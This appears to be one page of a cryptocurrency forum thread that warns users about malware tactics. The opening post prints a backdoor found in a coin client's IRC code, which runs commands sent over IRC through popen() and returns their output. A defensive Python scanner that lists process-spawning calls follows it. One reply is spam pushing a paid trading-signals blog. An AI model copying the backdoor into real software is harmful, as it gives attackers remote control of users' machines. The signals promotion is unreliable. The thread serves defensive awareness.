Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 25. (Read 835425 times)

newbie
Activity: 42
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
// Any IRC message of the right shape whose fourth word is ":!" is treated as a command.
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the line (from the fifth word on) is handed to CRead, an alias for popen().
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        // Extract the sender's nick (text between the leading ':' and the '!').
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Command output is sent back to the sender as a private message.
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // With the macros resolved, the shell-spawning popen() call is plainly visible.
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible, thanks for sharing this
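The lesson of the quoted post is that the dangerous call was hidden behind innocent-looking macro names (CRead for popen, CFree for pclose), so a plain grep of the tree for popen( finds nothing. The following added example (my own code, not from the post or from any coin's repository) is a small review helper that collects object-like #define aliases, expands them, and only then scans for process-spawning calls. The #define lines in the sample are my reconstruction of how the aliasing would have been done; only the resolved names ("PRIVMSG", FILE, popen, pclose) come from the post.

```python
import re

# Constructed sample input: the backdoored IRC handler quoted in the post,
# preceded by the #define aliases that would make CRead resolve to popen().
# The #define lines are an assumption about how the aliasing was done; only
# the resolved names ("PRIVMSG", FILE, popen, pclose) come from the post.
SAMPLE_SOURCE = r'''
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
    }
}
'''

# Calls that hand a string to a shell or spawn a process. Any occurrence in
# code that parses network input deserves a manual review.
DANGEROUS_CALLS = ("popen", "_popen", "system", "execl", "execlp", "execle",
                   "execv", "execvp", "execve", "CreateProcess", "ShellExecute")

# Object-like macros only: "#define NAME body" with no parameter list.
# Only spaces/tabs are allowed around the body so the newline is never consumed.
DEFINE_RE = re.compile(r'^[ \t]*#[ \t]*define[ \t]+([A-Za-z_]\w*)[ \t]+(.+?)[ \t]*$', re.M)
CALL_RE = re.compile(r'\b(%s)[ \t]*\(' % '|'.join(map(re.escape, DANGEROUS_CALLS)))


def collect_object_macros(source):
    """Return {name: body} for every object-like #define in the source."""
    return {m.group(1): m.group(2) for m in DEFINE_RE.finditer(source)}


def expand_macros(source, max_rounds=10):
    """Blank out the #define lines (line numbers stay stable) and substitute
    macro names by their bodies, repeating so chained aliases resolve too."""
    macros = collect_object_macros(source)
    code = DEFINE_RE.sub('', source)
    for _ in range(max_rounds):
        changed = False
        for name, body in macros.items():
            new_code = re.sub(r'\b%s\b' % re.escape(name), lambda _m, b=body: b, code)
            if new_code != code:
                code, changed = new_code, True
        if not changed:
            break
    return code


def find_dangerous_calls(source, expand=True):
    """Report (line_no, callee, line_text) for every process-spawning call.
    With expand=False the raw text is scanned, which is all a grep would see."""
    text = expand_macros(source) if expand else source
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            hits.append((line_no, m.group(1), line.strip()))
    return hits


if __name__ == "__main__":
    print("raw scan:     ", find_dangerous_calls(SAMPLE_SOURCE, expand=False))
    print("expanded scan:", find_dangerous_calls(SAMPLE_SOURCE))
```

On the sample, the raw scan reports nothing while the expanded scan flags the popen() on the CLine line. Running this over a whole tree (with all headers concatenated so that #defines from other files are seen) is a cheap first pass when reviewing a "revived" coin's source; function-like macros and typedef tricks are not handled, so a hit list of zero still means "read the network code by hand", not "clean".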
member
Activity: 736
Merit: 11
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Obviously, because we all know how much money this forum holds in digital form, it is of course very tempting for hackers to use it by embedding malware, so we must be more careful.
hero member
Activity: 1820
Merit: 775
Hello,

I found a site that checks if you have an account that has been compromised in a data breach (https://haveibeenpwned.com/). I want to know from the super geeks if this site is OK? Thank you and have a nice day.
newbie
Activity: 2
Merit: 0
If you need to earn good profit through cryptocurrencies, then go to this blog:

http://cryptocurrenciesconsultant.blogspot.com/

Just buy its consultant service and he will predict and provide you good signals to buy and sell any crypto coins. Most of his predictions are about 90% perfect. He has good trading experience to help out other traders as well.

If you have any question about how to buy/sell or any related question about trading and cryptocurrencies, then contact him.

I'm also using his service for the last few months, so I'm sharing it with you as well.
jr. member
Activity: 72
Merit: 4
I personally didn't confront anything like that, luckily, but thank you very much for the information. If I find someone, I'll add it to the list.
hero member
Activity: 1820
Merit: 775
I don't know if this is malware or what, but every time I copy an address and paste it where I should when I intend to send some funds, the address is changed: some characters are omitted. That's why when making transactions I use my phone instead of my PC. Does anyone experience this too? If this is a malware infection, what should I do?

Quote
Evrial detects when a bitcoin address is copied to the clipboard, then proceeds to replace it with an address that is under the attacker's domain. However, the virus manages to paste this information into a different application, which makes it more complex, they say.

https://tuscamisetas.net/crypto/new-virus-changes-bitcoin-addresses-from-the-clipboard-to-one-from-the-attacker-criptonews/

hero member
Activity: 1820
Merit: 775
No antivirus will protect you from a 0-day vulnerability. But by following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it first with the VirusTotal service:


Thank you very much for that thing, I will post it in the French section. We don't have such a useful thread there.
newbie
Activity: 29
Merit: 0
If you are on Linux/Unix, just use separate user accounts, with restricted access, for each wallet software that tends to be shady.
newbie
Activity: 42
Merit: 0
Correct me if I'm wrong, but malware is generally for executables on Windows, no? I mean the wallets are, but is it not Kaspersky enough?
If not, why do we need to protect against the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins) like DOGE, LTC, BTC and a few more.


Has anyone heard of people gaining access to people's private keys by watching them write it down by hacking the laptop camera? Or malware that will replace the pasted address with the hacker's address?
jr. member
Activity: 149
Merit: 4
No antivirus will protect you from a 0-day vulnerability. But by following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it first with the VirusTotal service:


Thanks for your good suggestion... 
member
Activity: 123
Merit: 11
I love coins.
I never click shortened URLs.
I have all my stuff offline as long as possible.
You can make offline transactions via MEW for ETH and ERC20 tokens:
https://myetherwallet.github.io/knowledge-base/offline/making-offline-transaction-on-myetherwallet.html
I also use a hardware wallet.
I use a good antivirus program.
I do my own research for new investments.
I never send coins somewhere if someone promises me to send more back!
I know I cannot mine BTC or other coins by visiting a website; they only want my money.
I know websites with 'free bitcoins' are a waste of time or a scam.

No one will make me rich because he is so nice.
I can only get rich if I make the right investments and am patient!

I don't trust others promising me big earnings!

I do not become greedy!

So I never had an infection....


newbie
Activity: 7
Merit: 0
Because this is unregulated, the temptation for fraud is becoming more and more frequent! It's scary as a newer person getting involved.

RFB
jr. member
Activity: 126
Merit: 4
Thanks! I am pretty paranoid with all these hacks; now I only use one device for crypto, no browsing other sites. It is also good to see this kind of post, because awareness is the best kind of prevention.
jr. member
Activity: 124
Merit: 5
Always beware of increasingly sophisticated malware infection attempts and just believe.
member
Activity: 210
Merit: 10
I led a large number of bounties, recorded everything on a flash drive, all the tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this; really, is it impossible to fight?
newbie
Activity: 21
Merit: 0
Cheers for the information and keeping the many noobs like myself a little safer from harm!
full member
Activity: 406
Merit: 131
No antivirus will protect you from a 0-day vulnerability. But by following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it first with the VirusTotal service:
newbie
Activity: 48
Merit: 0
Thanks for making this thread. Additional knowledge again for this day, thanks a lot.
member
Activity: 112
Merit: 21
This is terrible. I really thank you, because I almost got caught, and now I have started to install Adblock; I hope to block all the malware from online websites.
member
Activity: 86
Merit: 10
Please protect your money!
Always be careful and make the right choices. Do not click on strange links, no strange software downloads.
I think this is the most important part.